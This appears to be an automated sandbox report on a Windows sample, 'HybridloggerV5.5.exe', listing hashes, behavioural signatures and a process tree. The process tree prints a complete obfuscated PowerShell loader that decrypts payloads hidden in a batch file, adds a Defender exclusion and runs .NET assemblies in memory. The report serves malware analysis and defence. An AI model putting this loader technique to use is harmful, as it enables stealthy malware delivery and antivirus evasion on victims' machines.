Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-01-2025 00:02
Static task
static1
Behavioral task
behavioral1
Sample
HybridloggerV5.5.exe
Resource
win7-20240903-en
General
-
Target
HybridloggerV5.5.exe
-
Size
937KB
-
MD5
c9314841cdbf8522e9ee925039d3bfb7
-
SHA1
1b851459626862fdae6bdc0dd30aadf7a0f905ee
-
SHA256
9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7
-
SHA512
fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0
-
SSDEEP
24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2268 powershell.exe 2268 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2268 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1860 wrote to memory of 2340 1860 HybridloggerV5.5.exe 30 PID 1860 wrote to memory of 2340 1860 HybridloggerV5.5.exe 30 PID 1860 wrote to memory of 2340 1860 HybridloggerV5.5.exe 30 PID 1860 wrote to memory of 2264 1860 HybridloggerV5.5.exe 32 PID 1860 wrote to memory of 2264 1860 HybridloggerV5.5.exe 32 PID 1860 wrote to memory of 2264 1860 HybridloggerV5.5.exe 32 PID 2340 wrote to memory of 2852 2340 cmd.exe 34 PID 2340 wrote to memory of 2852 2340 cmd.exe 34 PID 2340 wrote to memory of 2852 2340 cmd.exe 34 PID 2264 wrote to memory of 2896 2264 cmd.exe 35 PID 2264 wrote to memory of 2896 2264 cmd.exe 35 PID 2264 wrote to memory of 2896 2264 cmd.exe 35 PID 2896 wrote to memory of 2848 2896 net.exe 36 PID 2896 wrote to memory of 2848 2896 net.exe 36 PID 2896 wrote to memory of 2848 2896 net.exe 36 PID 2264 wrote to memory of 2268 2264 cmd.exe 37 PID 2264 wrote to memory of 2268 2264 cmd.exe 37 PID 2264 wrote to memory of 2268 2264 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2852
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:2848
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD589a22d3791ca38666c8144725a74497d
SHA196b672089a3c783e4dd27e8da7c0cc1245d55cfd
SHA2569326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94
SHA5126b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e
-
Filesize
910KB
MD572ecd938d114e246eeebc8ae430fc2e9
SHA19ece59be22ceadcb3951093483cc69a76658801d
SHA2564eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65
SHA512d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e